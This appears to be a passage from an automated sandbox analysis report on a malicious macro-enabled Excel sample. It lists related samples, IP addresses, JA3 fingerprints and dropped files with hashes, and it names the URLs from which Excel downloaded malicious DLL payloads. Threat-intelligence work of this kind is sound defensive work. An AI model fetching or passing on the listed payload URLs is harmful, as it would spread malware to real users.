                • 35.208.84.24
                ARUBA-CLOUDITog0gax.dllGet hashmaliciousBrowse
                • 195.231.69.151
                M1OrQwls8C.dllGet hashmaliciousBrowse
                • 195.231.69.151
                CLOUDFLARENETUSByrnes Gould PLLC.odtGet hashmaliciousBrowse
                • 104.16.19.94
                aNmkT4KLJX.exeGet hashmaliciousBrowse
                • 104.23.98.190
                BankSwiftCopyUSD95000.pptGet hashmaliciousBrowse
                • 104.18.49.20
                brewin-Invoice024768-xlsx.HtmlGet hashmaliciousBrowse
                • 104.16.19.94
                Pokana2021011357.docGet hashmaliciousBrowse
                • 172.67.195.152
                09000000000000h.exeGet hashmaliciousBrowse
                • 172.67.188.154
                PO#218740.exeGet hashmaliciousBrowse
                • 172.67.164.253
                PO-5042.exeGet hashmaliciousBrowse
                • 104.28.4.151
                PO-000202112.exeGet hashmaliciousBrowse
                • 172.67.151.49
                20210113155320.exeGet hashmaliciousBrowse
                • 66.235.200.145
                13012021.exeGet hashmaliciousBrowse
                • 23.227.38.74
                Geno_Quotation,pdf.exeGet hashmaliciousBrowse
                • 104.23.99.190
                Po-covid19 2372#w2..exeGet hashmaliciousBrowse
                • 104.24.109.70
                FtLroeD5Kmr6rNC.exeGet hashmaliciousBrowse
                • 23.227.38.74
                6blnUJRr4yKrjCS.exeGet hashmaliciousBrowse
                • 104.24.111.173
                3S1VPrT4IK.exeGet hashmaliciousBrowse
                • 104.19.152.30
                cGLVytu1ps.exeGet hashmaliciousBrowse
                • 23.227.38.74
                onYLLDPXswyCVZu.exeGet hashmaliciousBrowse
                • 104.28.4.151
                AOA4sx8Z7l.exeGet hashmaliciousBrowse
                • 23.227.38.74
                PO-75013.exeGet hashmaliciousBrowse
                • 104.28.4.151
                DIAMATRIXZA1 Total New Invoices-Monday December 14 2020.xlsmGet hashmaliciousBrowse
                • 154.66.197.71

                JA3 Fingerprints

                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                eb88d0b3e1961a0562f006e5ce2a0b87INV8222874744_20210111490395.xlsmGet hashmaliciousBrowse
                • 221.126.244.72
                Inv0209966048-20210111075675.xlsGet hashmaliciousBrowse
                • 221.126.244.72
                INV2680371456-20210111889374.xlsmGet hashmaliciousBrowse
                • 221.126.244.72
                INV8073565781-20210111319595.xlsmGet hashmaliciousBrowse
                • 221.126.244.72
                INV3867196801-20210111675616.xlsmGet hashmaliciousBrowse
                • 221.126.244.72
                INV9698791470-20210111920647.xlsmGet hashmaliciousBrowse
                • 221.126.244.72
                INV7693947099-20210111388211.xlsmGet hashmaliciousBrowse
                • 221.126.244.72
                Document74269.xlsGet hashmaliciousBrowse
                • 221.126.244.72
                Document74269.xlsGet hashmaliciousBrowse
                • 221.126.244.72
                1 Total New Invoices-Monday December 14 2020.xlsGet hashmaliciousBrowse
                • 221.126.244.72
                1 Total New Invoices-Monday December 14 2020.xlsmGet hashmaliciousBrowse
                • 221.126.244.72
                1 Total New Invoices-Monday December 14 2020.xlsmGet hashmaliciousBrowse
                • 221.126.244.72
                1 Total New Invoices-Monday December 14 2020.xlsmGet hashmaliciousBrowse
                • 221.126.244.72
                1-Total New Invoices Monday Dec 14 2020.xlsmGet hashmaliciousBrowse
                • 221.126.244.72
                1 Total New Invoices-Monday December 14 2020.xlsmGet hashmaliciousBrowse
                • 221.126.244.72
                1 Total New Invoices-Monday December 14 2020.xlsmGet hashmaliciousBrowse
                • 221.126.244.72
                SecuriteInfo.com.Heur.15645.xlsmGet hashmaliciousBrowse
                • 221.126.244.72
                Statement_1857_of_12_09_2020.xlsmGet hashmaliciousBrowse
                • 221.126.244.72
                Statement_9505_of_12_09_2020.xlsmGet hashmaliciousBrowse
                • 221.126.244.72
                MSC printouts of outstanding as of 73221_12_09_2020.xlsmGet hashmaliciousBrowse
                • 221.126.244.72

                Dropped Files

                No context

                Created / dropped Files

                C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
                Process:C:\Windows\SysWOW64\regsvr32.exe
                File Type:Microsoft Cabinet archive data, 58936 bytes, 1 file
                Category:dropped
                Size (bytes):58936
                Entropy (8bit):7.994797855729196
                Encrypted:true
                SSDEEP:768:A2CCXehkvodpN73AJjDzh85ApA37vK5clxQh+aLE/sSkoWYrgEHqCinmXdBDz2mi:i/LAvEZrGclx0hoW6qCLdNz2pj
                MD5:E4F1E21910443409E81E5B55DC8DE774
                SHA1:EC0885660BD216D0CDD5E6762B2F595376995BD0
                SHA-256:CF99E08369397577BE949FBF1E4BF06943BC8027996AE65CEB39E38DD3BD30F5
                SHA-512:2253849FADBCDF2B10B78A8B41C54E16DB7BB300AAA1A5A151EDA2A7AA64D5250AED908C3B46AFE7262E66D957B255F6D57B6A6BB9E4F9324F2C22E9BF088246
                Malicious:false
                Reputation:high, very likely benign file
                Preview: MSCF....8.......,...................I........S........LQ.v .authroot.stl..0(/.5..CK..8T....c_.d...:.(.....].M$[v.4CH)-.%.QIR..$t)Kd...D.....3.n..u..............|..=H4.U=...X..qn.+S..^J.....y.n.v.XC...3a.!.....]...c(...p..]..M.....4.....i...}C.@.[..#xUU..*D..agaV..2.|.g...Y..j.^..@.Q......n7R...`.../..s...f...+...c..9+[.|0.'..2!.s....a........w.t:..L!.s....`.O>.`#..'.pfi7.U......s..^...wz.A.g.Y........g......:7{.O.......N........C..?....P0$.Y..?m....Z0.g3.>W0&.y](....].`>... ..R.qB..f.....y.cEB.V=.....hy}....t6b.q./~.p........60...eCS4.o......d..}.<,nh..;.....)....e..|....Cxj...f.8.Z..&..G.......b.....OGQ.V..q..Y.............q...0..V.Tu?.Z..r...J...>R.ZsQ...dn.0.<...o.K....|.....Q...'....X..C.....a;.*..Nq..x.b4..1,}.'.......z.N.N...Uf.q'.>}........o\.cD"0.'.Y.....SV..g...Y.....o.=.....k..u..s.kV?@....M...S.n^.:G.....U.e.v..>...q.'..$.)3..T...r.!.m.....6...r,IH.B <.ht..8.s..u[.N.dL.%...q....g..;T..l..5...\.....g...`...........A$:...........
                C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
                Process:C:\Windows\SysWOW64\regsvr32.exe
                File Type:data
                Category:dropped
                Size (bytes):326
                Entropy (8bit):3.1109170251425975
                Encrypted:false
                SSDEEP:6:kKtOCkswwDN+SkQlPlEGYRMY9z+4KlDA3RUegeT6lf:lkvkPlE99SNxAhUegeT2
                MD5:70222C6F424176083DF9D142305C388D
                SHA1:16BDB1F194CB9C851F7F142A5E0C49BF28EC75E6
                SHA-256:1F42CB7853F61BD7BE3FC20A7A9557D74A86C481A5BE56D96B602B047A548EC5
                SHA-512:DDD098536C4A1D01F4FB12B08B7CB649DC5EDC943E307F064CE194DBACF5D8D0CA66317629C4453468558D3D14D13EC1E22A3B9A0EED99C7EB1FCBD445E1B2B4
                Malicious:false
                Reputation:low
                Preview: p...... ...........1....(....................................................... ..........Y.......$...........8...h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".0.6.9.5.5.9.e.2.a.0.d.6.1.:.0."...
                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\dyu828kp[1].rar
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                Category:downloaded
                Size (bytes):303616
                Entropy (8bit):7.173739056148852
                Encrypted:false
                SSDEEP:6144:91IxO040SSrnmrwc4oU2FmrEaoGAC+Y5H2V3B9HQowUX:3IxO02Srnh0qEJC+Y2wbU
                MD5:9D545901D0F097F3995762EAE2BAAACD
                SHA1:4DFF3D52AD63E0351C0173EC49C41C289A5B0694
                SHA-256:015393180808B8E9A7014D3C481339D8D09B1F9C072243A03F50EC646401D9E6
                SHA-512:2C90CD2EC937282A4C2D54F31A1C84BE5F3629C24218D829455B09A922F0F8E98233BC9F6B7D9D1E0BB9B3BCB879ABF17911F00369DFDAF00381FC5CA466D12C
                Malicious:true
                Antivirus:
                • Antivirus: Joe Sandbox ML, Detection: 100%
                Reputation:low
                IE Cache URL:http://oudtshoornpharmacies.co.za/dyu828kp.rar
                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...S.._...........!...2.r...,...............0...............................................................................c.......................................................................................h...............................text............................... ..`.rdata.......0......................@..@.2...........@....... ..............@..@.rdata2......P......."..............@..@.data........`.......$..............@....text5..P............B.............. ..@.text4...R.......T...F.............. ..@.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................
                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\lpxtpiw[1].zip
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                Category:downloaded
                Size (bytes):303616
                Entropy (8bit):7.17372835806407
                Encrypted:false
                SSDEEP:6144:O1IxO040SSrnmrwc4oU2FmrEaoGAC+Y5H2V3B9HQowUX:wIxO02Srnh0qEJC+Y2wbU
                MD5:49225E5732E699224519E72E24A0CCEF
                SHA1:60D908C755D29ECDB5C10C772D622BAFC6C0AB10
                SHA-256:64FE6B2469357E938A49111BD59C45AF02EDB2A5D7D6E5D856C100416122934C
                SHA-512:F5A3D95C89A32DBB6738A318E44B8F24B5A3D5D04A9E8DF1231AF0BAB06A42A9C59D2738A13348B94E9A8F46B16D738CC988A8753933CB0854A9A71E4445D559
                Malicious:true
                Antivirus:
                • Antivirus: Joe Sandbox ML, Detection: 100%
                Reputation:low
                IE Cache URL:http://bipolarmalta.mccarthy.ws/lpxtpiw.zip
                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......_...........!...2.r...,...............0...............................................................................c.......................................................................................h...............................text............................... ..`.rdata.......0......................@..@.2...........@....... ..............@..@.rdata2......P......."..............@..@.data........`.......$..............@....text5..P............B.............. ..@.text4...R.......T...F.............. ..@.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................
                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\272CF97F.emf
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                Category:dropped
                Size (bytes):1408
                Entropy (8bit):2.270567557934206
                Encrypted:false
                SSDEEP:12:YnLmlzslqWuMap0Fol9l+EeQpN4lZsrBKlQzKlsl0u17u1DtDAcqitLMk+QCeJHo:Ync9640CXV34gNqXK7KhDDYB
                MD5:40550DC2F9D56285FA529159B8F2C6A5
                SHA1:DD81D41D283D2881BEC77E00D773C7E8C0744DA3
                SHA-256:DA935E8D60E93E41BCD7C3FBB1750EF3AC471C3AF78AFC8945DFBF31EB54A1E1
                SHA-512:FC354E4F37C9E1BA07DFC756F56A1ABE6A75230DEF908F34E43D35618B113A532E5B7C640F5B14BF75AC31003D8C66E06BA37A004E9357BF7896BD944A0514A0
                Malicious:false
                Reputation:moderate, very likely benign file
                Preview: ....l................................... EMF........).......................`...1........................|..F...........GDIC........L0.U......................................................................................................iii.......-.....................-.....................-.....................-.....................-.........!...............'...........................-.........!.........................$.............................-...............'.................$.............................-...............'.......................................................................................!...............................!...............................'...............iii.....%...........'.......................%...........'.......................%...........'.......................%...........'.......................%...........L...d...................................!..............?...........?................................"...........!...................
                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\46184574.png
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:PNG image data, 496 x 323, 8-bit colormap, non-interlaced
                Category:dropped
                Size (bytes):3964
                Entropy (8bit):7.60022097759879
                Encrypted:false
                SSDEEP:96:92FNKTOG5bPwCtYa4Fj/kO7JkJVnirez/Bd/TvQnU:92Fs5nN4FJOT77BJoU
                MD5:09CDFBE08B9DEEA66139F9BFF5892C40
                SHA1:B9EA3B8EC0598C235F65724ED5CAF2B263C03C6E
                SHA-256:A11153E9FBA72D4606E6FF6ACDF7CBFDC7D720A3565EAC5967BDB7DADAC4811C
                SHA-512:5249E3AFD0388CF645BF5B885302F48D42FD7383CE305599D6686F536CAC2023C136B0F2A9AD95629398B8060D5A015E01695A388384F3571B454C8F12E08FA7
                Malicious:false
                Preview: .PNG........IHDR.......C......,......tEXtSoftware.Adobe ImageReadyq.e<....PLTE............TTYg..oT.../..8....IDATx..... ..aC....e..}......9....l|...L2.],.JHWJ!.k.xQ.......................q..z.)F..%..c.~...}V.Q.].)?...o...F.Wx..g..R....I....sz....O[..V.i.Vs:..\._.>-p..8\......2.......Eu......s..A.|.....p./RJ;.$.....<..e....Cv..a..s.).......c...l..Z.......k.../..pN..H+W..1......"....K.._.be..Cs.9;...-..._.8.m..Z.....s........vf.D..x....s.O..[...e.#..c....-.B...u..|..<..U..6..........n.?.>.......*.j.i.mY...9/..."{.w....W.&p.H.0?C..%..Y}4KOCk.h.....Q8.oM.._.j.h..^uo..jY..{...v6.e....<.g.p..5.;.=6.[..8m.....2i).....{.[.....yr...[...n-NZm\..yQA../.^.q).j.....n.M,o9m...h..=bn...[....j...n...d..c..8W'%.N2..[.wk....|...W..N[...s...u....`A.J...O8x..M....d...so.t.:...O....;S.R.D+9..,.....i.Aw...{..."..ERg.np))..f.\.`;$...(.._{..~u.l..7...e.w..{...r...[+7l..sm...t.<....m........JQ..-..e.....s.v3&O.(..e._..PJ.;.....i..d......7Z...."|...M..U.N.9.
                C:\Users\user\AppData\Local\Temp\Cab7485.tmp
                Process:C:\Windows\SysWOW64\regsvr32.exe
                File Type:Microsoft Cabinet archive data, 58936 bytes, 1 file
                Category:dropped
                Size (bytes):58936
                Entropy (8bit):7.994797855729196
                Encrypted:true
                SSDEEP:768:A2CCXehkvodpN73AJjDzh85ApA37vK5clxQh+aLE/sSkoWYrgEHqCinmXdBDz2mi:i/LAvEZrGclx0hoW6qCLdNz2pj
                MD5:E4F1E21910443409E81E5B55DC8DE774
                SHA1:EC0885660BD216D0CDD5E6762B2F595376995BD0
                SHA-256:CF99E08369397577BE949FBF1E4BF06943BC8027996AE65CEB39E38DD3BD30F5
                SHA-512:2253849FADBCDF2B10B78A8B41C54E16DB7BB300AAA1A5A151EDA2A7AA64D5250AED908C3B46AFE7262E66D957B255F6D57B6A6BB9E4F9324F2C22E9BF088246
                Malicious:false
                Preview: MSCF....8.......,...................I........S........LQ.v .authroot.stl..0(/.5..CK..8T....c_.d...:.(.....].M$[v.4CH)-.%.QIR..$t)Kd...D.....3.n..u..............|..=H4.U=...X..qn.+S..^J.....y.n.v.XC...3a.!.....]...c(...p..]..M.....4.....i...}C.@.[..#xUU..*D..agaV..2.|.g...Y..j.^..@.Q......n7R...`.../..s...f...+...c..9+[.|0.'..2!.s....a........w.t:..L!.s....`.O>.`#..'.pfi7.U......s..^...wz.A.g.Y........g......:7{.O.......N........C..?....P0$.Y..?m....Z0.g3.>W0&.y](....].`>... ..R.qB..f.....y.cEB.V=.....hy}....t6b.q./~.p........60...eCS4.o......d..}.<,nh..;.....)....e..|....Cxj...f.8.Z..&..G.......b.....OGQ.V..q..Y.............q...0..V.Tu?.Z..r...J...>R.ZsQ...dn.0.<...o.K....|.....Q...'....X..C.....a;.*..Nq..x.b4..1,}.'.......z.N.N...Uf.q'.>}........o\.cD"0.'.Y.....SV..g...Y.....o.=.....k..u..s.kV?@....M...S.n^.:G.....U.e.v..>...q.'..$.)3..T...r.!.m.....6...r,IH.B <.ht..8.s..u[.N.dL.%...q....g..;T..l..5...\.....g...`...........A$:...........
                C:\Users\user\AppData\Local\Temp\Excel8.0\MSForms.exd
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:data
                Category:dropped
                Size (bytes):241332
                Entropy (8bit):4.206794602363457
                Encrypted:false
                SSDEEP:1536:cGPLEQNSk8SCtKBX0Gpb2vxKHnVMOkOX0mRO/NIAIQK7viKAJYsA0ppDCLTfMRsi:cSNNSk8DtKBrpb2vxrOpprf/nVq
                MD5:8FFE6C5816E277B3D88F5F21A8EEB8D4
                SHA1:23E9AE38C85040A9FE107C3B078B1F4C11AF7FFB
                SHA-256:3B8D72D6D2E5EA213B26246F3EB991768ADC4EBF217CFD88889F7788662A5ECD
                SHA-512:EFCC9DBEB3661BAA975DB414CCF7E2E1095000A6DC30B1BD5E1A741133A3DD8230D958E66D80315069624CEC537047DE8F98728C3960E62440FFB31C7CDDB5F7
                Malicious:false
                Preview: MSFT................Q................................$......$....... ...................d.......,...........X....... ...........L...........x.......@...........l.......4...........`.......(...........T...................H...........t.......<...........h.......0...........\.......$...........P...........|.......D...........p.......8...........d.......,...........X....... ...........L...........x.......@........ ..l ... ..4!...!...!..`"..."..(#...#...#..T$...$...%...%...%..H&...&...'..t'...'..<(...(...)..h)...)..0*...*...*..\+...+..$,...,...,..P-...-......|.......D/.../...0..p0...0..81...1...2..d2...2..,3...3...3..X4...4.. 5...5...5..L6...6...7..x7...7..@8.......8..............................H...4............................................................................x...I..............T............ ..P........................... ...........................................................&!..............................................................................................
                C:\Users\user\AppData\Local\Temp\FDFE0000
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:data
                Category:dropped
                Size (bytes):61899
                Entropy (8bit):7.86043889084538
                Encrypted:false
                SSDEEP:1536:hwEi+x8IYjqmC7n05w2nrjmSJ1K2OopeCDWiHqi+S9OnJXAGFqHR:hwET8DjlDySmIzFeCSiH3EnSxR
                MD5:5D4890B1F10A2264A9CDF62A7A9E932D
                SHA1:2982D9ACFAE45469F250604B38E639E356289F37
                SHA-256:5BD7F9A2EE250F8B8E26B114434001F0AE04B8B213174823783E5FDE3E7E134E
                SHA-512:5BCFFCBB565E088DEF347BB2D778E1CD3F76F6DBBCFCD1915A407F4F29EA231E8F8E0B57BDC94B9299C3B34005A6D2371B77859F1DA9AAE7AA60624B816B8623
                Malicious:false
                Preview: ...n.0.E.......H...(,g..6@S.[......(..w(9...a....u..q...........+R..N*....o.gR....Y..."....~<z...m..>%...(.`x..........\..........&..L.l.wP.'.......l.%........^+.....+/ ..k%@:.d.F....HFS....OH.....2..]0..1....0...-..&......|_;.....W>~......x..u.n.....+.....*(.....;7..Y.....s.:.e..XB+@..3R.Ep..o5..W...#...N.Yw.Y.|U.`rBK)o.dz..g.H.{...k........t.....4.m...3d...N..?.........N.k.....DO....A..b...-.....D.....q..8..,../#..K.F.......3...r..q... ..;.6........PK..........!.........*.......[Content_Types].xml ...(...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                C:\Users\user\AppData\Local\Temp\Tar7486.tmp
                Process:C:\Windows\SysWOW64\regsvr32.exe
                File Type:data
                Category:modified
                Size (bytes):152533
                Entropy (8bit):6.31602258454967
                Encrypted:false
                SSDEEP:1536:SIPLlYy2pRSjgCyrYBb5HQop4Ydm6CWku2PtIz0jD1rfJs42t6WP:S4LIpRScCy+fdmcku2PagwQA
                MD5:D0682A3C344DFC62FB18D5A539F81F61
                SHA1:09D3E9B899785DA377DF2518C6175D70CCF9DA33
                SHA-256:4788F7F15DE8063BB3B2547AF1BD9CDBD0596359550E53EC98E532B2ADB5EC5A
                SHA-512:0E884D65C738879C7038C8FB592F53DD515E630AEACC9D9E5F9013606364F092ACF7D832E1A8DAC86A1F0B0E906B2302EE3A840A503654F2B39A65B2FEA04EC3
                Malicious:false
                Preview: 0..S...*.H.........S.0..S....1.0...`.H.e......0..C...+.....7.....C.0..C.0...+.....7.............201012214904Z0...+......0..C.0..*.....`...@.,..0..0.r1...0...+.....7..~1......D...0...+.....7..i1...0...+.....7<..0 ..+.....7...1.......@N...%.=.,..0$..+.....7...1......`@V'..%..*..S.Y.00..+.....7..b1". .].L4.>..X...E.W..'..........-@w0Z..+.....7...1L.JM.i.c.r.o.s.o.f.t. .R.o.o.t. .C.e.r.t.i.f.i.c.a.t.e. .A.u.t.h.o.r.i.t.y...0..,...........[./..uIv..%1...0...+.....7..h1.....6.M...0...+.....7..~1...........0...+.....7...1...0...+.......0 ..+.....7...1...O..V.........b0$..+.....7...1...>.)....s,.=$.~R.'..00..+.....7..b1". [x.....[....3x:_....7.2...Gy.cS.0D..+.....7...16.4V.e.r.i.S.i.g.n. .T.i.m.e. .S.t.a.m.p.i.n.g. .C.A...0......4...R....2.7.. ...1..0...+.....7..h1......o&...0...+.....7..i1...0...+.....7<..0 ..+.....7...1...lo...^....[...J@0$..+.....7...1...J\u".F....9.N...`...00..+.....7..b1". ...@.....G..d..m..$.....X...}0B..+.....7...14.2M.i.c.r.o.s.o.f.t. .R.o.o.t. .A.u.t.h.o
                C:\Users\user\AppData\Local\Temp\ndrztpo.dll
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                Category:dropped
                Size (bytes):303616
                Entropy (8bit):7.173739056148852
                Encrypted:false
                SSDEEP:6144:91IxO040SSrnmrwc4oU2FmrEaoGAC+Y5H2V3B9HQowUX:3IxO02Srnh0qEJC+Y2wbU
                MD5:9D545901D0F097F3995762EAE2BAAACD
                SHA1:4DFF3D52AD63E0351C0173EC49C41C289A5B0694
                SHA-256:015393180808B8E9A7014D3C481339D8D09B1F9C072243A03F50EC646401D9E6
                SHA-512:2C90CD2EC937282A4C2D54F31A1C84BE5F3629C24218D829455B09A922F0F8E98233BC9F6B7D9D1E0BB9B3BCB879ABF17911F00369DFDAF00381FC5CA466D12C
                Malicious:true
                Antivirus:
                • Antivirus: Joe Sandbox ML, Detection: 100%
                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...S.._...........!...2.r...,...............0...............................................................................c.......................................................................................h...............................text............................... ..`.rdata.......0......................@..@.2...........@....... ..............@..@.rdata2......P......."..............@..@.data........`.......$..............@....text5..P............B.............. ..@.text4...R.......T...F.............. ..@.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................
                C:\Users\user\AppData\Local\Temp\pgjasrqd.dll
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                Category:dropped
                Size (bytes):303616
                Entropy (8bit):7.17372835806407
                Encrypted:false
                SSDEEP:6144:O1IxO040SSrnmrwc4oU2FmrEaoGAC+Y5H2V3B9HQowUX:wIxO02Srnh0qEJC+Y2wbU
                MD5:49225E5732E699224519E72E24A0CCEF
                SHA1:60D908C755D29ECDB5C10C772D622BAFC6C0AB10
                SHA-256:64FE6B2469357E938A49111BD59C45AF02EDB2A5D7D6E5D856C100416122934C
                SHA-512:F5A3D95C89A32DBB6738A318E44B8F24B5A3D5D04A9E8DF1231AF0BAB06A42A9C59D2738A13348B94E9A8F46B16D738CC988A8753933CB0854A9A71E4445D559
                Malicious:true
                Antivirus:
                • Antivirus: Joe Sandbox ML, Detection: 100%
                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......_...........!...2.r...,...............0...............................................................................c.......................................................................................h...............................text............................... ..`.rdata.......0......................@..@.2...........@....... ..............@..@.rdata2......P......."..............@..@.data........`.......$..............@....text5..P............B.............. ..@.text4...R.......T...F.............. ..@.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................
                C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Tue Oct 17 10:04:00 2017, mtime=Wed Jan 13 23:38:54 2021, atime=Wed Jan 13 23:38:54 2021, length=8192, window=hide
                Category:dropped
                Size (bytes):867
                Entropy (8bit):4.469266406019514
                Encrypted:false
                SSDEEP:12:85QICLgXg/XAlCPCHaXgzB8IB/g9X+WnicvbVbDtZ3YilMMEpxRljKVTdJP9TdJ2:85vU/XTwz6IQYeFDv3q8rNru/
                MD5:C1C366ED2708962587157FFA9E8A8FC4
                SHA1:792280E5B176CA566A1AE76580914AA9BCAD8F4F
                SHA-256:95310528EDEB00D8AAD1AE97AA6E657474593F1A9420709D74C9B7638177232C
                SHA-512:AB5CF4CFF97F6D752D9B7D288B619CC44023E1C0F74AA3F09D42A957B1A659ECD90132395CEC57D7998384D351152835B0932C15D4CF3A6DAF200B2AE0A59B79
                Malicious:false
                Preview: L..................F...........7G..&.D.....&.D...... ......................i....P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......R....Desktop.d......QK.X.R..*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......i...............-...8...[............?J......C:\Users\..#...................\\910646\Users.user\Desktop.......\.....\.....\.....\.....\.D.e.s.k.t.o.p.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......910646..........D_....3N...W...9r.[.*.......}EkD_....3N...W...9r.[.*.......}Ek....
                C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:ASCII text, with CRLF line terminators
                Category:dropped
                Size (bytes):106
                Entropy (8bit):4.390245389988799
                Encrypted:false
                SSDEEP:3:oyBVomxWdxUPITOhVdUPITmxWdxUPITv:djuSLW4S0
                MD5:37891FF049405BB442FCFD7FF79CC0CE
                SHA1:B1E3919208707AD6A480BE0B49A2DCFF9704AA3A
                SHA-256:9F7AB8A5295E2D636E3CAB3C2DCB7FC07CD9870F6099B188A55F462D43E7994D
                SHA-512:D9431FA09546D4A1EE59B3FC8F347107EA4D49DE99A1FC557B0FD3E8A255EC3BF05A6FBBEA9D1E6CA97592436082A0F6B7272B1741CD6C63FFDAFAD275A1DCDD
                Malicious:false
                Preview: Desktop.LNK=0..[misc]..sample20210113-01.LNK=0..sample20210113-01.LNK=0..[misc]..sample20210113-01.LNK=0..
                C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\sample20210113-01.LNK
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:13 2020, mtime=Wed Jan 13 23:38:54 2021, atime=Wed Jan 13 23:38:57 2021, length=61904, window=hide
                Category:dropped
                Size (bytes):2108
                Entropy (8bit):4.50887990469077
                Encrypted:false
                SSDEEP:48:8U5b/XT3IkCl/KblH8Qh2U5b/XT3IkCl/KblH8Q/:8U5/XLIkp8Qh2U5/XLIkp8Q/
                MD5:FD6BFCF56800ACACE67B365206269AAF
                SHA1:D3DCF4677AA0D31CD2A2B9770BF3483D2E1D56C1
                SHA-256:2DE0F4FDA49776477D90C950F73E61A569A002210A6D3F252EBAFC410C74A6EA
                SHA-512:FCF0CA29057EC13B0FE392309998DE5FA825F1EE41C8DBD958B0E0DDB4D4A86A969A252591582C4E0E88F3B0E5AA6C2EF2FD761E14CC5D07FC60F58B51941B46
                Malicious:false
                Preview: L..................F.... ...V.9..{..&.D..........................................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......Q.y..Desktop.d......QK.X.Q.y*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....v.2.z....R.. .SAMPLE~1.XLS..Z.......Q.y.Q.y*...8.....................s.a.m.p.l.e.2.0.2.1.0.1.1.3.-.0.1...x.l.s.m.......................-...8...[............?J......C:\Users\..#...................\\910646\Users.user\Desktop\sample20210113-01.xlsm.-.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.s.a.m.p.l.e.2.0.2.1.0.1.1.3.-.0.1...x.l.s.m.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......910646..........D_....3N...W..
                C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\WBLPQVYT.txt
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:ASCII text
                Category:downloaded
                Size (bytes):117
                Entropy (8bit):4.420599948060351
                Encrypted:false
                SSDEEP:3:GmM/nABVdppsxBWGPVYSURoMK0cSNsW3dmvkWr6RUL/n:XM/AD5sHDMRaCtmL0UL/n
                MD5:264B69988F1EC377B5BA624DD6E1FD81
                SHA1:5AB0AD3058CD6286511B22BA4DA242F129AAA8BC
                SHA-256:B2ED535313C3E12528FEE32EE2A86EF2B757358F8E91CC39E1DCE1B7EA415984
                SHA-512:CE417FB1FF1CEC35A85B212C7802099F48AA05800DEA53AC5F3BD71E14D80AC8339C0C34A23EE433FA983A1FB189D7AD1CCE08C56FEE6EFDF111AA95EB5147CF
                Malicious:false
                IE Cache URL:invoteqleads.com/
